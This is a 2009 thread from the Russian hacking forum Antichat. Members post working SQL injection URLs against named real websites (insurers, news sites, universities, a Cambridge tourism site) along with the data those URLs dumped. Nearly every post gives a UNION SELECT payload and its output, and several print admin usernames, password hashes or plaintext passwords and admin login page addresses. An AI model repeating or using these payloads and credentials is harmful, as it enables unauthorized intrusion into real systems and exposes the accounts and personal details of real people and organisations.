ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7871  
Старый 16.02.2009, 23:57
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

idg.bg - PR 7

Код:
http://events.idg.bg/?call=USE~events;&id=3+union+select+1,concat_ ws(0x3a,version(),database( ),user()),3,4--
Database Version : 4.1.22-log
Database name : events
User name : spiridon@localhost


админы:

Код:
http://events.idg.bg/?call=USE~events;&id=3+union+select+1,concat_ ws(0x3a ,user,password),3,4+from+ mysql.user--
Код:
root:*A3D00BFBECA25837E7D8C87895FF81D1ABB20C93
spiridon:6294f8ca11192704
webadmin2:5ae1cdf626a45787
stormdevil:*818844DA62BBAC1C12CF2F960F24FA392A543CA3 
cacti:6c9dbb641fab2064
 
Ответить с цитированием

  #7872  
Старый 17.02.2009, 00:14
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.rep3.ro/view_event.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7/*



Database Version: 5.0.22-Debian_0ubuntu6.06.11-log
Database name: ds_rep3
User name: rep3@localhost
 
Ответить с цитированием

  #7873  
Старый 17.02.2009, 00:22
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://noc.teilam.gr/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.32-Debian_7etch8-log

Код:
http://noc.teilam.gr/filemgmt/singlefile.php?lid=-2+union+select+1,2,concat(passwd,username),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users/*
8b2ecafccebcd0c49f4d1189c0a283f5:Admin

Код:
http://noc.teilam.gr/admin/moderation.php
админка
 
Ответить с цитированием

  #7874  
Старый 17.02.2009, 00:46
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

PR - 5

Код:
http://www.generali.bg/main/en/life_insurance_investment_fund.php?id=-1+union+select+1,concat _ws(0x3a,version( ),database(),user()),3,4,5,6,7--
Database Version : 4.1.22-standard-log
Database name : generali_site
User name : generali_general@localhost


------------------------------------------#

PR - 4

Код:
http://voob.ru/index.php?division_id=-1+union+select+1,concat_ w s(0x3a,version(),database(),user()),3,4,5,6--

Database Version : 5.0.45
Database name : wwwvoobru
User name : voob@localhost


------------------------------------------#

PR - 4

Код:
http://rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6,7--
Database Version : 5.0.41-log
Database name : rosstok
User name : rosstok@jet.mplik.ru


юзвери:

Код:
http://rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,concat_ ws(0x3a,id_user,nik,passw,email),4,5,6,7+from+user--
их 3029 чела ... выводятся сразу все без лимита

Последний раз редактировалось f1ng3r; 17.02.2009 в 10:20..
 
Ответить с цитированием

  #7875  
Старый 17.02.2009, 12:28
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

Код:
http://www.mosmedia.com.tr/cinar/ilkogretim/icerik.php?id=65+union+select+1,2,3,table_name,5,column_name,7,8,9,1+from+information_schema.columns+limit+193,1
PS: limit+193,1уже не верил что она вообще там есть)

Цитата:
http://www.peterkay.dk/news.php?ID=15+union+select+1,table_name,3,4,5,6,7 ,8,9,10,11,12,13+from+information_schema.tables+li mit+17,1
Цитата:
http://www.peterkay.dk/news.php?ID=15+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13+from+information_schema.columns+ where+table_name=char(97,100,109,105,110)+limit+2, 1
Цитата:
http://www.peterkay.dk/news.php?ID=15+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13+from+information_schema.columns+ where+table_name=char(97,100,109,105,110)+limit+2, 1
Цитата:
http://www.peterkay.dk/news.php?ID=15+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13+from+information_schema.columns+ where+table_name=char(97,100,109,105,110)+limit+3, 1
Цитата:
http://www.peterkay.dk/news.php?ID=15+union+select+1,AdminPassword,3,4,5, 6,7,8,9,10,11,12,13+from+admin
AdminUsername: peterkay
AdminPassword: peterkay

Последний раз редактировалось jokester; 17.02.2009 в 13:27.. Причина: объединяй посты
 
Ответить с цитированием

  #7876  
Старый 17.02.2009, 17:13
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

(Все таблицы)

Код:
http://real-renta.ru/all.php?type=1%20union%20select%201,2,3,4,5,6,7,8,9,table_name,11%20from%20information_schema.tables--
Версия 5...
 
Ответить с цитированием

  #7877  
Старый 17.02.2009, 17:54
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.arctic-adventure.dk/page.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/*
 
Ответить с цитированием

  #7878  
Старый 17.02.2009, 18:37
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Colocation | Broadband Wireless | Dedicated Servers | DocSTAR | DSL | Web Hosting | Web Design & Development - Infinity Internet
Код:
http://www.iinet.com/support/answer.php?id=-17'+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11/*
user(): infinityinternet@web08.pacifier.net
database(): iinetcom
version(): 4.0.25

PR=5
тИЦ=250
 
Ответить с цитированием

  #7879  
Старый 17.02.2009, 19:41
Аватар для edichka
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию

Посетите Кэмбридж =) Pr 6

http://visitcambridge.org


http://www.visitcambridge.org/unique.php?id=-3+union%20select%201,2,3

Database Version: 5.0.22
Database name: visitcambridge
User name: visitcambridge@localhost

Логинка : www.visitcambridge.org/cms

frankiem::::happyfeet::::frankie.mcghee@cambridge. gov.uk
 
Ответить с цитированием

  #7880  
Старый 17.02.2009, 21:26
Аватар для Napas
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

www.atlantic-university.org

Код:
https://www.atlantic-university.org/home.php?CopyID=-111+union+select+1,2,3,4,5,login,pwd+from+users/*
4.1.25-Debian_mt1-log

одменка - https://www.atlantic-university.org/login/
webmaster:n0m3@+p1@


kennedy.byu.edu
Код:
http://kennedy.byu.edu/isp/print.php?id=-219'+union+select+1,2,3,4,5,cast(concat(version(),0x2f,user())+as+binary),7,8/*
4.1.7-nt


www.clarkson.edu
Код:
http://www.clarkson.edu/news/print.php?id=-1877'+union+select+table_name,null+from+information_schema.tables+where+table_name+not+in+('body','comments','D99_Tmp','Headlines','Headlines$','News_release','Paragraphs','Paragraphs$','Sysdiagrams','User12')--+
Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition On Windows NT 5.2 (Build 3790: Service Pack 2)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ